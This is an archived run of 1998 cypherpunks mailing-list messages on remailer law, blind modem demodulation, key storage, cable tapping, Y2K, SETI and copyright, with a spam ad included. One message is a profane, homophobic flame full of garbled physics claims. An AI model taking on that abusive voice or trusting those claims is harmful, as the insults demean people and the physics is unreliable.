packet info". (I presume you mean 'Wet Computercriminaliteit II' ?)

There is a part that makes ISP liable if they cannot point to a
'user' but the law explicitly states that you have to be in
the business of being an ISP, running a remailer is not my business,
it is a 'not for profit' hobby, so it will be fun to see how "they"
will 'manouvre' to bring that also under the law ...

Anyways could you please sent me the relevant parts of this law that 
lead you think this way ?

bEST Regards,
--
Alex de Joode | International CryptoRunners | http://www.replay.com
         'A little paranoia can lengthen your life'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Sun, 8 Nov 1998 11:01:13 +0800
To: cypherpunks@cyberpass.net
Subject: Blind signal demodulation
Message-ID: <91049302221713@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



The October 1993 Proceedings of the IEEE contain a number of rather 
interesting articles on blind signal identification and demodulation, which 
may be described roughly as "demodulation without the cooperation of the 
transmitter (or intended receiver where this might be necessary)".  The first 
article in particular goes into some detail on how to acquire QAM signals used 
in modems, including a neat diagram on p.1919 of a 64-QAM constellation 
through the various stages of acquisition by a blind demodulator.  The blind 
demodulation comletely bypasses the need for an initial training stage, 
acquiring the necessary signal-processing details on the fly.
 
The article finishes with overviews of typical hardware used for blind 
demodulation of QAM signals, including a multi-protocol DSP card with with 8 
320C50's capable of blind demodulation of anything from 24 2400bps signals up 
through 8 V.34 ones, as well as an ASIC for blind demodulation of digital 
cable TV signals.  They also comment that blind decoders for typical voiceband 
signals can be implemented on Pentium MMX/UltraSparc-grade hardware.  This is 
interesting reading, and should lay to rest the UL that high-speed modems have 
some sort of magic immunity to interception which the lower-speed ones don't.
 
Oh yes, the introduction makes the observation that this sort of stuff is 
"rarely mentioned in the open literature".  It's not hard to see why.
 
Peter.                                                               
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz (Peter Gutmann)
Date: Sun, 8 Nov 1998 19:16:42 +0800
To: jkthomson@bigfoot.com
Subject: Re: verisign digital id's for outlook <shudder>
Message-ID: <91052249324053@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain



>A quick question for all you security-savvy people.  Our IT instructor has
>asked the class to sign up for verisigns' 60-day trial of a class 1 digital
>id.
>
>I also understand that a well (poorly?) written activeX applet can grab my
>key basically without my knowledge (to speak nothing of the other myriad
>holes in win98/95)
>
>My question is, where the hell is the private key kept on the users box?
>How is it protected against attack?
 
It's protected by Microsoft asserting that it's protected.  There's also some
sort of attempt at encryption (easily broken, see
http://www.cs.auckland.ac.nz/~pgut001/breakms.txt), but in any case there are
enough security holes there that anything which manages to run on your system
(ActiveX, as you've mentioned) can grab your keys without a lot of trouble.
 
Peter.
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MusicBoulevard <MusicBoulevard@specials.musicblvd.com>
Date: Sat, 7 Nov 1998 02:15:19 +0800
To: "cypherpunks@toad.com>
Subject: ** Specials from MusicBoulevard
Message-ID: <199811061725.MAA07921@butkus>
MIME-Version: 1.0
Content-Type: text/plain




******************************************************
Music Boulevard is excited to announce:

* This Week's New Release Lineup
* The Essential Time Life Christmas Collection CD
* Our New Music Gear Department (CD Racks, Headphones, 
  and more... )
* An incredible new album from Burt Bacharach & 
  Elvis Costello - Painted From Memory
******************************************************

Dear Cypher,

Music Boulevard has some amazing new offers headed 
your way. 

We've got new music and exclusive new departments that 
put the music you want right where you want it. 

Starting with 10 hot new releases...

---1---
John Lennon
The John Lennon Anthology [Box]
http://www.musicblvd.com/cgi-bin/tw/3752_43_622293^S&FP=MB-NR

---2---
Alanis Morissette
Supposed Former Infatuation
http://www.musicblvd.com/cgi-bin/tw/3752_43_623127^S&FP=MB-NR

---3---
REM
UP 
http://www.musicblvd.com/cgi-bin/tw/3752_43_620749

---4---
U2
The Best of 1980-1990 Ltd
http://www.musicblvd.com/cgi-bin/tw/3752_43_625068^S&FP=MB-NR

---5---
Beck
Mutations
http://www.musicblvd.com/cgi-bin/tw/3752_43_624859

---6---
Luciano Pavarotti & Friends
Pavarotti & Friends for the Children of Liberia Classical
http://www.musicblvd.com/cgi-bin/tw/3752_43_612938^S&FP=MB-NR

---7---
Garth Brooks - Advance Order: Order now before it hits the stores!
Double Live
http://www.musicblvd.com/cgi-bin/tw/3752_43_625372^S&FP=MB-NR

---8---
Herbie Hancock
Gershwin's World
http://www.musicblvd.com/cgi-bin/tw/3752_43_613064

---9---
Louis Armstrong - Advance Order: Order now before it hits the stores!
An American Icon
http://www.musicblvd.com/cgi-bin/tw/3752_43_624856

---10---
Taj Mahal
In Progress & In Motion 1965-1998 [Box Set]
http://www.musicblvd.com/cgi-bin/tw/3752_43_613571^S&FP=MB-NR

These are just a few of the hot albums that Music Boulevard 
puts at your fingertips -- 24 hours a day, every day. 
For other new releases, visit:
http://www.musicblvd.com/cgi-bin/tw/3752_0_new_releases.txt

--------------------------------------------------------------

We've also got the best new holiday music available anywhere...

Get ready to celebrate the holiday season with
The Time-Life Treasury of Christmas
http://www.musicblvd.com/cgi-bin/tw/3752_43_627350

This exclusive 2-CD collection features over 40 timeless
recordings by the greatest singers of our era.

We also have a new Holiday Music Department at:
http://www.musicblvd.com/cgi-bin/tw/3752_20_hol

--------------------------------------------------------------

Our new music gear department is now open for business ...

Music Boulevard is proud to announce our new Music Gear Department, 
where you'll find CD cases, storage units, cleaners, shelving, 
headphones, electronics and much more!  
http://www.musicblvd.com/cgi-bin/tw/3752_20_acc

--------------------------------------------------------------

And finally, we've got a great deal on Elvis Costello & 
Burt Bacharach's new album.

One of the year's most acclaimed albums,
Painted From Memory is now on sale.
http://www.musicblvd.com/cgi-bin/tw/3752_43_582448

It's the duo of the decade and they've joined forces in what 
critics are hailing as a pop masterpiece and an unparalleled 
musical event. (And its on sale today!)

And remember our top 100 Sellers are ALWAYS on sale.
http://www.musicblvd.com/cgi-bin/tw/3752_0_lists/t100.txt

We're very excited about this week's lineup, and hope you enjoy 
the great selection, service and convenience that's made us the
#1 online music store.

>From one music fan to another,

Chris Hoerenz
Store Manager
http://www.musicblvd.com/

 

P.S. If, for any reason, you'd prefer not to receive future 
updates or announcements from Music Boulevard, you may reply 
to this email and type "unsubscribe" as the subject line of 
your reply to stop receiving emails.



[94454-981105]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 9 Nov 1998 00:07:02 +0800
To: cypherpunks@toad.com
Subject: Spy News
Message-ID: <199811081454.JAA30292@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



NYT reports today on a new book, "Blind Man's Bluff,"
which reports on the US's success at placing surveillance 
devices on Soviet subsea communications cables around 
the world. With much technical detail about how it was 
done, beginning with the simple but overlooked idea of 
locating shoreline warning signs about undersea cables 
then tracking from there.

The devices, some up to 20 feet long for housing elaborate 
processing equipment, captured electronic emanations, thereby 
eluding detection measures aimed at physical taps. One was 
found by the Soviets but  most were not and much information 
on the program is still classified.

AT&T and Bell labs built many of them. The US Navy will not 
comment on the book, citing national security restrictions.

The Times also has an obituary for Tommy Flowers, the gent who 
guided construction of Colossus machines at Bletchley Park to 
break top-level German codes during WW II.

There's still interesting debate about the Paul Dore story of
picking up signals from space, which he first thought were from
aliens, but which seems more likely to be from a surveillance
satellite, and possibly from a type not publicly known. Not enough
data yet to show that the story is not a hoax, or disinformation by
US/UK spy agencies, but it has led to informative discussion of 
what such signals could indicate. Notes on this at:

   http://jya.com/project415.htm

More commentary welcome, here or privately.

Some will recall a vigorous discussion here a few years back
about listening in on US undersea cables, commencing at the
landfall points (dense packs of them here in the NYC area), 
many handily marked on coastal seafaring maps.

Or, for more up-to-date technology, setting a receiver to point in
the direction of those on TLA bases (needing an x-ray of the
concealing radome).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 9 Nov 1998 03:36:53 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: IP: Crunch Time for Y2K Suppliers (fwd)
Message-ID: <199811081712.LAA05240@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 08 Nov 1998 00:35:04 -0500
> From: Declan McCullagh <declan@well.com>
> Subject: Re: IP: Crunch Time for Y2K Suppliers

> Seems to me that it would have been just as easy for "believer" to send the
> URL to the story as the whole thing. Same with ol'VZ.
> 
> Not only is it in poor taste, but it means less people will read the
> article on wired.com, which is what pays the rent.

True, but since when is freedom of speech, association, and press related to
wired (or you) making a profit?

I feel zero social responsibility to tell people to go there and read it
when I can send a snippet of it to them directly and save them the time,
effort, and bandwidth. I personaly absolutely *HATE* to recieve a piece of
email that contains nothing but a URL, it's worthless - lacks all context.

Don't like folks sending partial or whole articles to foster discussion,
learn to love it or live with it.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 9 Nov 1998 04:08:24 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199811081742.LAA05396@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Ah, what the hell. It's a good day to practice the golden rule.

Forwarded message:

> Date: 8 Nov 1998 04:40:03 -0000
> From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
> 

> It seems so pointless to correct Choate.  The guy is almost totally
> impervious to enlightenment.  But a couple of whoppers have to be
> pointed out...

Speakin of pointless anonymous know-it-all bullshit ....

> Electrons don't "carry" photons.

Actualy they carry the probability wave for the photon (which technicaly
could be anywhere in the universe at any given time because of space
contraction caused by relativistic effects), but for this particular
discussion which concerns ionized or non-correlated electrons carrying a
unit charge and Joules of energy (which is where the photon comes in you
anonymous fucking ignoramus) saying the electron is carrying a photon is
sufficient.

>  An atom can absorb a photon, raising
> an electron to a higher energy level, but the photon is then gone.

Well actualy to be absolutely exact the photon is locked between the protons
and the electron. It is *NEVER* gone or destroyed. You can't destroy energy,
only transform it's form. The photon is *NEVER* absorbed by anything.

Now exactly how is the 'higher energy' level expressed?  By a *PHOTON* of
shorter wavelength (E=hv) you know-nothing smart-ass anonymous dick-muncher.

> a single moving electron certainly doesn't carry a photon.  Photons move
> at the speed of light, always.

Only when they are not correlated to a particle such as a proton or an
electron. When an electron or a proton carry a packet of energy (measured in
Joules) it most certainly carries a photon. Let's look at the electrical
characteristic called voltage (you probably haven't heard of this since the
rest of your pseudo-science is as full of bullshit as your mouth) which is
measured in Joules/Coulomb. Now a Coulomb of electrons moving past a given
point in a unit second is an Amp of current. Want to explain how those
electrons manage to carry those Joules of photons if their isn't a
correlation? I didn't think you did you anonymous lying sack of horse sperm.

Since photons *ARE* light (you fucking anonymous ninny) your last point is
irrelevant and redundant. Of course they ALWAYS travel at the speed of
light, it's how we define light in the first place.

> Quarks are constituents only of baryons.  There are no quarks in electrons
> or photons.

Quarks are constituents of hadrons you dumbass prick sucking gay boy. Protons
and Neutrons are hadrons built from 3 quarks and some other bosons (some
vector and some not) that glue the nucleus together. Electrons and photons
are called Leptons (because they are their own vector boson). Electrons carry
electrical unit negative charge and photons carry EM fields.

A Baryon is a distinction based on the type of quarks that make up the
hadron. If the paticle is made up of no anti-quarks it's a baryon, othwise
it's a meson.

God, what a load of quantum mechanical horse hockey you spout this fine
Sunday morning. I can't hardly wait to see what other anonymous drivel you
spew out of your syphilis infested mouth next.

> The net charge within the sphere will not change.

Then you need to go back to school and learn Gauss's Law all over again.
It's ok, you'll probably get it in the first semester unless they recognize
what a dumb-ass you are and put you in the remedial section. Then I believe
you'll be scheduled to cover those topics your Junior year.

> If the box in the
> middle with the "spark gap" is spraying out electrons, this can only mean
> that the box is itself becoming positively charged.  The sphere sees a
> constant charge within itself; at best, the charge can be redistributed.

Which is the whole point to this exercise. The simple fact that I can put a
battery powered radio in a metal sphere as described and *STILL* receive
the signal proves the model works within the constraints of the original
thesis.

Don't believe me? Try it at home with a couple of collanders soldered
together.

The charge is re-distributed to the surface of the sphere, the total charge
of the entire system does stay constant (at least until the insulation
breaks down).

> There are no net changes of charge within the sphere and so there will
> be no changes in any charge appearing on the outside of the sphere.

If that were so we wouldn't have a spark in the ball to begin with.

> Choate's whole model of how a spark gap transmitter works, and why it
> emits electromagnetic radiation, is so bizarre that it is hard to believe.
> Someone else can bang their head against the brick wall of his ignorance
> on that topic.

Who said anything about a spark gap transmitter? We were talking about a
battery powered spark gap. Not the same thing at all you anonymous weenie
sucker.

> Choate is, by far, the worst poster on the cypherpunks list today.  He
> posts off-topic material, he is argumentative, and 90% of the time, he
> is simply wrong.

Oh, your just jealous I want let you suck my dick junior.

Waaaaaaaaaaaaaaaaahhhhhhhhhhhhhhhhhhhhh


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 9 Nov 1998 05:03:11 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811081809.MAA05525@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 08 Nov 1998 00:18:26 -0500
> From: Michael Hohensee <mah248@nyu.edu>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)

> You missed my point.  What I'm trying to point out is that no government
> (or any other body, for that matter) can prevent someone from doing
> something.

Of that we agree. Which is why I will continue to believe the issues we deal
with are not government problems but people problems.

> All the state can do (and does, if you look closely) is
> offer to punish anyone who disobeys it.  It doesn't matter whether that
> state is protecting individual rights or not --it can only punish, not
> prevent.

Well to be even more exact, they offer a guarantee of retribution if they
can catch or prove somebody broke a law.

Of course we could posit a government that pairs everyone up in groups of
two (a perpetual no-lone zone), the ultimate police state.

> I'm explaining why it is impossible for the state to protect individual
> rights.

I suspect we're playing word games here with 'protect'. I am not refering to
what my neighbor does to me when he gets pissed off that my stereo is too
loud. That obviously the government (local, state, or federal) can do
nothing about a priori. Where the governemnt (at all levels) *CAN* in fact
protect individual rights is the way they create the laws they enforce on
all citizens (eg tax laws or dope-smoking laws). Those most certainly can be
crafted to prevent abuse of civil liberties. Our own Constitution is a
perfect example. The problem is the *people* who we elect believe they are
above it and instead of asking "Do the laws we pass conform to the letter
and intent of the Constitution?" instead state "It's a flexible document
that is hard to interpet because of wording and changes in society". They
want an out to not have to play by the rules. Nothing more and nothing less.

> I offer two mechanisms by which the state *could* _protect_
> individual rights, and then point out why they are impossible.  It is
> something of a strawman argument, but if you disagree, I'm willing to
> tear down any mechanism you might propose. :)

See above. It isn't the rules that matter, it's the respect the arbiters of
the rules have *for* the rules that matter. With that clearly in mind *any*
mechanism is doomed to fail from the beginning.

> > > All any state can do is threaten to "retaliate" against (why not just
> > > say "attack") people who disobey its edicts.  In order for this threat
> > > to be credible, the state must wield sufficient power to kill any
> > > individual (or group of individuals) who would stand against it.  If it
> > > does not have this power, it cannot govern.
> > 
> > This is a quaint and completely artificial distinction.
> 
> Is it really?  Then could you please explain to me exactly why I would
> have to pay taxes (or otherwise make submission) to a state which did
> *not* have the power to kill me? 

So you wouldn't have to stand there and watch your house burn to the slab.
So you would have help finding the perpetrator who raped your daughter last
night. So when you drive down the street it isn't a whole filled muddy tract
through a economicaly impoverished wasteland. So when you write a check you
know there is something behind it that is trustworthy. So when you have that
wrech late some rainy night there is an ambulance and a hospital to take you
to.

As to your (and others) particular focus on taxes, all it would take to
resolve that issue is a single law:

No citizen may have their home, personal property, or their liberty
infringed or removed because of tardy taxes. Of course I'd add a section in
there that would direct the tax accessor of the appropriate local to send a
note to all relevant services to refuse to provide services to you. I'd even
them impound vehicles that were operated on public streets without the
appropriate licenses.

Don't want to let your house burn down, fine. Let the fucker burn to the
slab. Your daughter gets raped, fine. You figure out who did it on your own.
Don't want to pay vehicle and related taxes, fine don't drive your vehicle
on public streets.

Just face it. It isn't the threat of violence that pisses you off. It's that
you have social responsibilities to those around you. Taxes represent a
responsibility that you don't want and to hell with the consequences.

> this in a physical sense, not a legal one-- then what is to stop me or
> anyone else from telling it to fuck off?  Such a state cannot govern
> those who do not wish to be governed, and so would not be a government.

No state can govern those who don't wish to be governed, violence or no.

[I've deleted a great gob of this since it's the same just rehashed in
different sentences.]

And to answer a specific question, I'm familiar with Dawkins work.

> When two bears approach the same berry bush, they do not immediately
> start fighting over it.

What time of year is it? If we're talking in the spring when they're just
out of hibernation they will begin to attack immediately. If it is two males
in rut in the fall they will attack immediately. If you examine the way
Alaskan Browns share the Salmon runs in the spring you will find ample
evidence why Dawkins example isn't worth the paper it's writ on.

>  Instead, they each stick to one side of the
> bush, and do not disturb one another.

Malarcky. I'm familiar with the way bears and other mammals work and this is
gibberish. Unless the bears are related one of them will be finding another
bush pronto.

> pretty good at attacking things.  It would be pretty easy for a
> exceptional bear to break this rule, and become dominant over the other
> bears, if what you say is true.

Except your forgetting the nature of bears. Except in heat bears are
solitary animals. They don't like groups and avoid them. They defend their
territory to whatever level of force is required. In most cases (Alaskan
Brown are a well studied example you can find tons of literature on) they
will not even approach each other closer than several hundred feet. So the
question of them sharing a berry bush is a contrived example that is
irrelevant and doesn't occur in nature outside of family groups that are
transient and only last 1-2 years depending on the type of bear and the food
supply.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 9 Nov 1998 05:04:05 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Advertising Creepiness (fwd)
Message-ID: <199811081816.MAA05583@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Information Security <guy@panix.com>
> Date: Sun, 8 Nov 1998 12:59:09 -0500 (EST)
> Subject: Re: Advertising Creepiness

> Would you like to know whether it is "fair use" to repost entire articles?
> 
> I would.

When it is non-profit, and is equivalent to my neighbor bringing his morning
paper over to show me a story (I don't subscribe to the paper so I haven't a
license with the copyright holder in principle or practice) he wants to talk
about.

With the way the law is going that will soon be illegal for me to even look
at the paper, though we can probably still talk about it.

Though the probable next step is to make even that verbal recitation
illegal.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Mon, 9 Nov 1998 04:14:10 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Electric power generators ?
Message-ID: <199811081725.JAA08583@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



You're talking about the wired.com article I wrote.

I carefully did not say there is a "shortage" of generators, diesel or
otherwise -- that's your own misreading of it.

I did say that the largest U.S. distributor of diesel generators has half
year delays on the most popular model. Same with bulk food suppliers like
Walton's. Solar power companies also report vastly increased demand.

You can buy cheaper gasoline generators at Home Depot, but there are
reasons people want to pay three or four times as much for a diesel model.
These differences and the other answers to your questions have been
well-documented elsewhere; I'm not inclined to list them for you here,
though others might be.

-Declan



At 05:52 PM 11-7-98 -0600, Igor Chudov @ home wrote:
>
>Hi there,
>
>I saw an article posted about "shortages" of electric power generators
>and other Y2K "survival" goods, such as grains in airtight drums. My
>reading of the article gave me a feel that those products are bullshit
>products geared towards naive losers, and can be easily replaced with
>much cheaper products that can be bought at discount stores.
>
>More careful reading of the article showed that only certain high power
>diesel generators are scarce.
>
>A visit to my local discount retailer has shown that there are 10KW
>gasoline generators available for as little as $500. 10KW is far more 
>than I would need in an emergency. (I will probably need about 2KW).
>
>Questions:
>
>1) Aside from probably lower power, are those cheaper generators somehow
>worse?
>
>2) How reliable are those cheaper generators?
>
>3) What is their expected lifetime, in hours of operation?
>
>4) How hard is it to service them?
>
>5) How do you connect them to the electric system, to properly use
>them as backup? (this may be a stupid question, but I am not very 
>familiar with American system of electric wiring).
>
>6) How much gasoline do they consume if you draw 2KW power from them?
>
>Thank you.
>
>----------------------------------------------------------------------------
>char*p="char*p=%c%s%c;main(){printf(p,34,p,34);}";main(){printf(p,34,p,34);}
>
>                \=/,         _-===-_-====-_-===-_-==========-_-====-_
>                |  @___oo   (                                        )_
>      /\  /\   / (___,,,}_--=                                          )
>     ) /^\) ^\/ _)        =__       Anything is good and useful if    )
>     )   /^\/   _)          (_                                        )
>     )   _ /  / _)            (         it's made of chocolate.        )
> /\  )/\/ ||  | )_)            (_                                     )
><  >      |(,,) )__)             (   http://www.algebra.com/~ichudov   )
> ||      /    \)___)\             (_                                  _)
> | \____(      )___) )___           -==-_____-=====-_____-=====-___==
>  \______(_______;;; __;;;
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 9 Nov 1998 05:10:18 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: IP: Discover Alien Life With Your PC And SETI (fwd)
Message-ID: <199811081829.MAA05664@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 7 Nov 1998 20:39:58 -0800
> From: Steve Schear <schear@lvcm.com>
> Subject: Re: IP: Discover Alien Life With Your PC And SETI

> Perhaps I'm missing something, but it seems to me that if I were an alien
> civilization and wanted to send out a beacon, in as wide an angle as
> possible, across the vast reaches of space and overcome as much of the path
> losses as possible using the least energy I certainly wouldn't use a narrow
> band signal. Quite the contrary, I'd want to spread a low bandwidth
> information signal across the widest practical spectrum. Its much easier to
> increase process gain (the ratio of the baseband information signal to the
> final carrier bandwidth) than transmit power.

The problem becomes the 1/r^2 losses. The receivers on this end have fixed
lower end to their sensitivity that sets a minimal effective energy output
at the transmitter. If you do the math you find that the entire Earth
doesn't generate enough energy to send a spread-spectrum wide-band signal
more than a few light-years out, not worth the effort or the social costs
(nobody'd know about it because radio and television and such wouldn't be
available since we're using all *that* energy for sending the signal).

This might work for a hive mentality society but not for people.

> While a narrow band signal from Arecibo's powerful transmitter/antenna
> combination can be detected at a distance of about 300 light years.

Since it's only been transmitting intermittenly about 30 years that's more
than a tad moot.

> Switching to a spread spectrum approach could allow broadening the antenna
> pattern, and thereby its chances of detection, significantly without
> reducing its effective range.

Spread spectrum won't effect the beam angle of the dish, that's set when the
dish is designed - spread spectrum or not. Also you'll need to build a new
set of LMB's since the old ones won't be able to handle the frequency range
or the gross power input required to keep the new signal at a given
frequency at a respectible power level with the other frequencies we're now
operating on in parallel. That baby's gonna get hot.

> Notice how 63 dB (or over 2,000,000 fold
> effective increase in transmit power) of process gain enables handheld GPS
> receivers to pull in signals from satellites, sent using only a few watts
> of transmit power, without much of an antenna.

It's amazing how much you can pull in when you increase the sensitivity of
the front-end and use mechanisms to reduce noise.

> If all this seems to make sense, then why are the SETI people apparently
> seaching the skies with lots of narrow band receivers? They don't seem to
> be employing any broadband correlator techniques, so spread signals will
> probably be missed.

Then you haven't been keeping up with the Million Channel Receiver system
that has been operating at Aricebo for several years. You also haven't been
keeping up with the folks out at White Sands either who also impliment
receivers of the same spread-spectrum type. Just about all the current big
money (there ain't any since the feds cut the budget several years ago)
projects use this system and the small-money and individual projects also
impliment it but at a lower range of bandwidth sampled.

It isn't that these folks don't want to use the latest technology it's that
they can't.....$$$.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Mon, 9 Nov 1998 06:56:54 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B266@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




> You missed my point.  What I'm trying to point out is that no 
> government (or any other body, for that matter) can prevent 
> someone from doing something. All the state can do (and does,
> if you look closely) is offer to punish anyone who disobeys it.

Again that is simply incorrect, or do you wish to tell me that our military
has not prevented the invasion of the continental US in this century, or
that it did not prevent the Soviet Union from expanding across Europe? You
cannot completely discount *deterrent force*, although it is greatly
overrated.

Nor can a government use *retribution force* if it does not know the
perpetrator.

Your statement boils down to the government is not omnipotent. Well duh!

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Mon, 9 Nov 1998 06:39:34 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: A question about the new ISP ruling and email... (fwd)
In-Reply-To: <199811080408.WAA04069@einstein.ssz.com>
Message-ID: <v04003a01b26bb1b9917d@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



>>        `(B) accommodates and does not interfere with standard
>> technical measures.
>>
>>           `(2) DEFINITION- As used in this subsection, the term
>> `standard technical measures' means technical measures that are used
>> by copyright owners to identify or protect copyrighted works and--
>>
>>      `(A) have been developed pursuant to a broad consensus of
>> copyright owners and service providers in an open, fair, voluntary,
>> multi-industry standards process;
>
>So this is voluntary?
>
>>     `(B) are available to any person on reasonable and
>> nondiscriminatory terms; and
>
>Meaning they themselves aren't copyrighted?
>
>>    `(C) do not impose substantial costs on service providers or
>> substantial burdens on their systems or
>> networks.
>
>Imposition of *any* cost is a substantial burden.

And this is where we should fight them. When the CDA was struck down one of
the compelling arguments accepted by the court was that it was way too
costly for information providers to police those accessing their sites. The
same argument can easily be made for posted materials, especially the huge
Usenet feed.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Mon, 9 Nov 1998 05:02:08 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Milton Friedmann get's pied....
Message-ID: <199811081848.MAA05734@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Seems the Mayor of San Fran and Milton have something in commen....


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------

ps I didn't forward anything from this so that nobody'd get upset they
   missed their meal-train.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 9 Nov 1998 05:23:37 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Advertising Creepiness
Message-ID: <199811081759.MAA27023@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From owner-ignition-point@majordomo.pobox.com Sat Nov  7 16:04:32 1998
   >   To: ignition-point@majordomo.pobox.com, cypherpunks@cyberpass.net
   >   From: Robert Hettinga <rah@shipwright.com>
   >   Subject: IP: Re: A question about the new ISP ruling and email...
   >   Cc: believer@telepath.com
   >
   >   Now *this* should be fun. Someone who claims to be a cypherpunk is now
   >   going to call the copyright police on a non-profit, volunteer news list.

Would you like to know whether it is "fair use" to repost entire articles?

I would.

   >   When the going gets tough, the "tough" rat out the innocent, it appears...

"Innocent" is hardly an accurate description of Michele Moore.

Would you like Information Security to cough up more
color on his netcopping move?

Hey, you ratted me out to the IP list!

;-)

----

   >   From: Steve Mynott <stevem@tightrope.demon.co.uk>
   >   Subject: Re: Advertising Creepiness
   >
   >   On Sat, Nov 07, 1998 at 11:50:05PM -0800, Tim May wrote:
   >    
   >   > Myself, I try to mostly just snip out a few paragraphs of a story and
   >   > comment on them, fair use and all.
   >   >
   >   > My guess is that nearly all of us skip this junk
   >   > completely, and I think marketing studies will someday confirm this.
   >
   >   Click through rates are something like 2%, so most are screening them out.
   >   I rarely noticed what the ads actually said.
   >
   >   > (Yes, I tried the utilities which purport to flush banner ads, but they
   >   > didn't work well (long delays, cruftiness).)
   >
   >   I don't know which ones you have tried but junkbuster 
   >
   >   http://www.junkbuster.org/ (a proxy on port 8000)
   >
   >   works _very_ well on my linux system, particularly with the "blank gif"
   >   patch.
   >
   >   It blanks out 99% of banner gifs, which makes pages like metacrawler and
   >   wired look more visually attractive and load faster.

But, when sites get smarter about using server-side includes,
